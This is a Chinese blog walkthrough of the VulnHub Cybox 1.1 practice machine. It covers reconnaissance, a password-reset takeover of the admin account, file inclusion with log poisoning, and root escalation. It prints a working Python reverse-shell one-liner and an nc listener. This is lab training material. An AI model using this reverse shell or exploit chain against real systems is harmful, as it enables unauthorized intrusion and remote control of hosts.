vulnhub-Cybox: 1.1

最新推荐文章于 2024-03-26 15:28:46 发布
最新推荐文章于 2024-03-26 15:28:46 发布
阅读量1.2k 收藏 3
点赞数 1
分类专栏: vulnhub
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/yutianovo/article/details/111687112
版权
该博客围绕靶机渗透测试展开,先介绍靶机下载信息,接着进行信息搜集,包括端口扫描、目录扫描和子域名信息获取。利用越权更改密码、文件包含等漏洞获取低权限用户,最后尝试创建用户并切换,实现提权到Root权限。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

靶机描述

http://blog.yutian233.xyz/index.php/archives/72/

Will you be able to compromise the internal server of the CYBOX company?

Difficulty: Medium

Objective: Get user.txt and root.txt

This works better with VirtualBox rather than VMware.

Contact: @takito1812

## Changelog 2020-12-06 - 1.1 2020-11-21 - 1.0

下载 https://www.vulnhub.com/entry/cybox-11,607/

清单

  • 信息搜集

    • gobuster
    • 越权更改密码
    • 文件包含

  • 提权

    • suid - register
    • sudo su root

信息搜集

靶机IP

端口扫描

nmap 192.168.34.152

Not shown: 993 filtered ports
PORT    STATE  SERVICE
21/tcp  open   ftp
25/tcp  open   smtp
53/tcp  closed domain
80/tcp  open   http
110/tcp open   pop3
143/tcp open   imap
443/tcp open   https

主页信息

image-20201225153941438

底部带有域名信息

将域名信息添加至 /etc/hosts

image-20201225154022252

目录扫描

---- Scanning URL: http://192.168.34.152/ ----
==> DIRECTORY: http://192.168.34.152/assets/                                                                                                                                                 
+ http://192.168.34.152/cgi-bin/ (CODE:403|SIZE:210)                                                                                                                                         
+ http://192.168.34.152/index.html (CODE:200|SIZE:8514)                                                                                                                                      
+ http://192.168.34.152/phpmyadmin (CODE:403|SIZE:92)

子域名信息

gobuster vhost -u http://cybox.company/ -w /usr/share/wordlists/dirb/big.txt

Found: [.cybox.company (Status: 400) [Size: 226]
Found: dev.cybox.company (Status: 200) [Size: 209]
Found: ftp.cybox.company (Status: 200) [Size: 5295]
Found: monitor.cybox.company (Status: 302) [Size: 0]
Found: register.cybox.company (Status: 200) [Size: 1252]
Found: webmail.cybox.company (Status: 302) [Size: 0]

将信息添加至 /etc/hosts

192.168.34.152 cybox.company
192.168.34.152 dev.cybox.company
192.168.34.152 ftp.cybox.company
192.168.34.152 register.cybox.company
192.168.34.152 monitor.cybox.company
192.168.34.152 webmail.cybox.company

dev 为 phpinfo信息

ftp 为 ftp 服务器

register 为 一个创建用户的页面

monitor

image-20201225154540003

webmail

image-20201225154556666

1、使用 register 创建一个用户

2、在 monitor 使用找回密码功能

image-20201225154853961

3、在 处可以收到一份邮件
image-20201225154917713

将连接改为 admin@cybox.company 即可越权更改密码

4、在找回密码后,登陆来到monitor.cybox.company/admin/index.php

image-20201225155103790

image-20201225155140147

此处存在文件包含

验证

image-20201225155202799

在phpinfo信息中得到 apache 的访问日志

image-20201225155430836

文件包含后在信息中只看到了 ftp 页面的访问记录,所以需要在ftp页面抓包

开启burp

image-20201225155518632

修改请求头,尝试命令执行

验证

image-20201225155556549

低权限用户

1、开启监听

nc -lvp 443

2、反弹shell payload

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.34.158",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

得到shell

image-20201225160018943

cd /opt

ls -al

image-20201225160050744

Root

尝试创建一个用户

image-20201225155845725

尝试切换用户

su sudo

sudo # 密码

image-20201225155757325

ROOT

image-20201225155729697

cybox靶机渗透测试
weixin_49340699的博客
06-17 870
cybox靶机渗透测试环境工具流程 环境 靶机;kali 工具 nmap; netdiscover; hydra; gobuster; brupsuite; nc 流程 主机发现端口扫描 在web首页发现域名 添加到etc/hosts 使用gobuster工具对其子域名扫描 gobuster vhost -u http://cybox.company/ -w /usr/share/wordlists/dirb/big.txt 同样添加到/etc/hosts 访问域名后发现分别为登录注册和一个ft
cybox靶机wp
m0_52496313的博客
08-06 498
cybox靶机wp
cybox1-1靶机练习
yifujiadeng的博客
05-09 1027
cybox:1.1靶机练习 网络结构: 环境搭建平台为VMware15,网络为nat模式,网段192.168.1.0/24 网络由攻击机kali、靶机组成 靶机ip:192.168.1.141 kali linux ip:192.168.1.137 信息收集: 主机发现: nmap -sP 192.168.1.0/24 下图中192.168.1.1为VMnet8网卡地址,1.3位网关地址,1.137为kali地址,因此判断目标靶机地址为192.168.1.141 端口服务扫描: 靶机开启了80和443
【靶机】vulnhub靶机cybox1
weixin_52450702的博客
02-28 615
vulnhub靶机cybox
Cybox靶机
wanjia01的博客
11-28 654
Cybox靶机-wp
vulhub打靶记录——cybox
最新发布
qq_55202378的博客
03-26 921
的话,是解析不到IP的,我们在host文件中绑定域名和IP,再访问该域名就可以找到这个IP,因为本机host文件是先于DNS服务器的。来读取css文件,加上这里可以传参,可以试试有没有文件包含漏洞~ 但是,需要注意的是,访问该页面需要admin用户的cookie。根据之前的信息,1.4.22版本的邮件服务器有远程代码执行漏洞,现在我们有可以登录的用户名和密码了,去试试~,搜索了一下,只发现一个远程代码执行的漏洞,但是前提是有一个可登录的用户名和密码,所以也没啥用。,可以注册一个用户,然后也可以注册成功。
Email-to-CybOX: 将RFC 822电子邮件转换为CybOX XML
资源摘要信息:"email-to-cybox:从 RFC 822 电子邮件生成 CybOX XML" 知识点详细说明: 1. RFC 822电子邮件标准 RFC 822是一份由互联网标准制定组织Internet Engineering Task Force (IETF)于1982年发布的标准文档...
stix-ramrod:更新STIX和CybOX XML内容
04-27
一个用于升级结构化威胁信息表达(STIX)和网络可观察表达(CybOX)XML内容的Python库。 来源: 说明文件: 信息: | 概述 stix-ramrod软件包提供用于升级STIX和CybOX内容的API和脚本。 STIX内容可以从1.0升级到...
Threat-Intel:威胁-英特尔存储库。 原料药
03-16
DigitalSide威胁-英特尔 该存储库包含一组开源网络威胁情报信息,这些信息主要基于恶意软件分析以及受损的URL,IP和域。 该项目的目的是开发和测试新方法,以搜寻,分析,收集和共享IoC的相关集合,以便由SOC / ...
stix-ramrod:简易Python库升级STIX和CybOX XML内容
- **STIX和CybOX的关系**:它们都是为了增强网络安全领域信息共享和自动化处理的能力而设计的,STIX专注于威胁信息的内容和表达,而CybOX则侧重于具体可观察的网络事件和行为。 - **升级XML内容**:随着网络安全形势...
x509-to-cybox:从 X.509 证书文件生成 CybOX XML
06-25
X.509 证书到 CybOX XML 转换器 从 X.509 证书文件生成 CybOX XML 版本:2.1.0 Copyright (c) 2015 - The MITRE Corporation All rights reserved. See LICENSE.txt for more details. BY USING THIS PROGRAM, YOU SIGNIFY YOUR ACCEPTANCE OF THE TERMS AND CONDITIONS OF USE. IF YOU DO NOT AGREE TO THESE TERMS, DO NOT USE THIS PROGRAM. 概述 X509-to-CybOX 程序解析 X.509 证书(保存为纯文本)并创建包含相应 X509Certificate 对象的 CybOX 文档。 兼容: 安装 下载包含的文件并
靶机Cyberry
qq_43335965的博客
08-09 112
工具 hydra、crunch、dirbuster 涉及到的点 Port knocking(端口试探) Brainfuck编码 ftp爆破 ssh爆破 openssl enc加密 命令执行漏洞 Linux awk 命令 渗透过程 靶机地址192.168.1.10。开放的端口21、22、80。 访问80端口,在源码里面存在base64加密的字符串,拿到一个secretfile.html。 给了一串...
Vulnhub_breackout靶机渗透测试
m0_66225311的博客
09-15 171
本次靶机对我来说还是比较难的,因为很多知识点都没有很好的接触过,都是第一次见,也从中学到了很多知识首先就是注释中的加密后的字符串了,因为有CTF密码学方向的学习,所以还是有所察觉的接下来就是enum4linux工具对smb服务的信息收集操作了,增加了对smb服务利用的知识点本次获取shell的操作可以说很简单了,网站直接就有可以执行shell的功能。
vulhub和vulnhub的区别?
ailx10
03-22 2138
今天研究了一下靶场,然后就搜到了vulhub,还有vulnhub,傻傻的分不清楚。vulhub:是docker化的漏洞学习平台vulnhub:是实打实的网络攻防娱乐靶场vulhub 确实是个宝藏,里面有上百个漏洞环境,让安全研究员可以将精力集中在漏洞研究上首先,启动漏洞对应的docker环境(docker-compose up -d 以heartbleed漏洞为例子)heartbleed漏洞的具体...
VulnHub_FunBox
qq_45434762的博客
08-29 647
发现目标主机我们使用nmap扫描整个网段sudo nmap 192.168.1.0/24 扫描端口使用Nmap探测目标主机开放的端口,发现目标主机开放了,21,22,80端口sudo n...
VulnCTF的练习教室v1.0-------WEB-----------第一题【LFI | 伪协议】
大方子
10-04 1019
项目地址:https://github.com/jianmou/VulnCTF ============================ 个人收获: 1.利用PHP内置协议直接读取网页代码   ==============================     题目:   我们查看下网页源码 通过代码发现是文件包含。   我们把url改为http://local...
Vulnhub靶机渗透测试实战(一):DC-1(入门)
热门推荐
weixin_41038469的博客
03-11 2万+
关于Vulnhub Vulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试虚拟机下载。 新手入门DC-1: 下载地址: https://www.vulnhub.com/entry/dc-1-1,292/ 主机渗透系统: macOS10.13 安装好虚拟机后挂载Virtualbox运行 第一次进行渗透实战演练,打开虚拟机后发现需要登录密码,一脸懵逼。翻查网页上的介绍才知道,就是不...
vulnhub靶机-cengbox
臭nana的博客
06-23 1478
1、使用netdiscover扫描一下靶机ip:192.168.0.107 2、nmap扫描一下目标开放端口:22、80 3、访问80端口,没什么有用的信息,直接用kali自带的dirb扫描目录 dirb http://192.168.0.107 /usr/share/wordlists/dirb/big.txt 4、看着masteradmin和uploads两个目录有点可疑,猜测masteradmin应该是管理后台,uploads应该是个保存上传文件的目录,应该是需要上传文件,两个直
VulnHub实战篇一:Billu_Box靶机渗透记录
a1004070060的博客
03-31 1963
0x00前言 由于2020年疫情原因,被迫宅家已有两个月之久,假期里边摸鱼边学习也浪费了不少时光。感叹光阴似箭的同时,临近毕业也加倍地感受到就业的压力。最近听了某位OSCP大佬的安利,决定开始拿VulnHub练练手。 本系列文章用来记录VulnHunb靶机的渗透过程,欢迎各位师傅讨论学习。 0x01靶机信息 靶机名称:Billu_b0x 下载地址:https://downloa...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值